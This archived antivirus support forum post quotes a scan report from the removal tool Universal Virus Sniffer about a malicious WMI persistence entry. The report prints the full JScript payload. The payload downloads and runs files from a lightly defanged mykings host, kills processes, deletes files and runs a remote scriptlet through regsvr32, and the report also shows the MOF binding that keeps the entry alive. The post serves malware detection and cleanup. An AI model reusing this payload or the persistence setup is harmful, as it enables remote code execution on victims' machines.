Jump to content

Archived

This topic is now archived and is closed to further replies.

KAMIRAN Support

WMI Infections

Recommended Posts

At the forum forum.esetnod32.ru we solve the problem with WMI scripts using the program Universal Virus Sniffer

https://forum.esetnod32.ru/forum6/topic14074/
 

Quote

 

Полное имя WMI_ACTIVESCRIPTEVENTCONSUMER\YOUMM2_CONSUMER.[YOUMM2_FILTER]
Имя файла YOUMM2_CONSUMER.[YOUMM2_FILTER]
Тек. статус ?ВИРУС? ПОДОЗРИТЕЛЬНЫЙ в автозапуске

Удовлетворяет критериям
WMI_ACTIVESCRIPTEVENTCONSUMER(CONSUMER_NAME ~ YOUMM2_CONSUMER)(1) [delall (0)]

Сохраненная информация на момент создания образа
Статус в автозапуске

Namespace \\.\root\subscription
Consumer_Name youmm2_consumer
Consumer_Class ActiveScriptEventConsumer
Consumer_ScriptingEngine Jscript
Consumer_ScriptText var toff=3000;var url1 = "][ттп://wmi.mykings.top:8888/kill.html";http = new ActiveXObject("Msxml2.ServerXMLHTTP");fso = new ActiveXObject("Scripting.FilesystemObject");wsh = new ActiveXObject("WScript.Shell");http.open("GET", url1, false);http.send();str = http.responseText;arr = str.split("\r\n");for (i = 0; i < arr.length; i++) { t = arr.split(" "); proc = t[0]; path = t[1]; dele = t[2]; wsh.Run("taskkill /f /im " + proc, 0, true);if (dele == 0) { try { fso.DeleteFile(path, true); } catch (e) {} } };var locator=new ActiveXObject("WbemScripting.SWbemLocator");var service=locator.ConnectServer(".","root/cimv2");var colItems=service.ExecQuery("select * from Win32_Process");var e=new Enumerator(colItems);var t1=new Date().valueOf();for(;!e.atEnd();e.moveNext()){var p=e.item();if(p.Caption=="rundll32.exe")p.Terminate()};var t2=0;while(t2-t1<toff){var t2=new Date().valueOf()}var pp=service.get("Win32_Process");var url="][ттп://wmi.mykings.top:8888/test.html",http=new ActiveXObject("Microsoft.XMLHTTP"),ado=new ActiveXObject("ADODB.Stream"),wsh=new ActiveXObject("WScript.Shell");for(http.open("GET",url,!1),http.send(),str=http.responseText,arr=str.split("\r\n"),i=0;arr.length>i;i++)t=arr.split(" ",3),http.open("GET",t[0],!1),http.send(),ado.Type=1,ado.Open(),ado.Write(http.responseBody),ado.SaveToFile(t[1],2),ado.Close(),1==t[2]&&wsh.Run(t[1]);pp.create("regsvr32 /s shell32.dll");pp.create("regsvr32 /s WSHom.Ocx");pp.create("regsvr32 /s scrrun.dll");pp.create("regsvr32 /s c:\\Progra~1\\Common~1\\System\\Ado\\Msado15.dll");pp.create("regsvr32 /s jscript.dll");pp.create("regsvr32 /u /s /i:][ттп://js.mykings.top:280/v.sct scrobj.dll");pp.create("rundll32.exe c:\\windows\\debug\\item.dat,ServiceMain aaaa");
Filter_Name youmm2_filter
Filter_Class __EventFilter
Filter_Query select * from __timerevent where timerid="youmm2_itimer"
#MOF_Bind#
instance of __FilterToConsumerBinding
{
Consumer = "\\\\.\\root\\subscription:ActiveScriptEventConsumer.Name="youmm2_consumer"";
Filter = "\\\\.\\root\\subscription:__EventFilter.Name="youmm2_filter"";
};

#MOF_Event#
instance of __EventFilter
{
Name = "youmm2_filter";
Query = "select * from __timerevent where timerid="youmm2_itimer"";
QueryLanguage = "wql";
};


 

 

Share this post


Link to post
Share on other sites

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...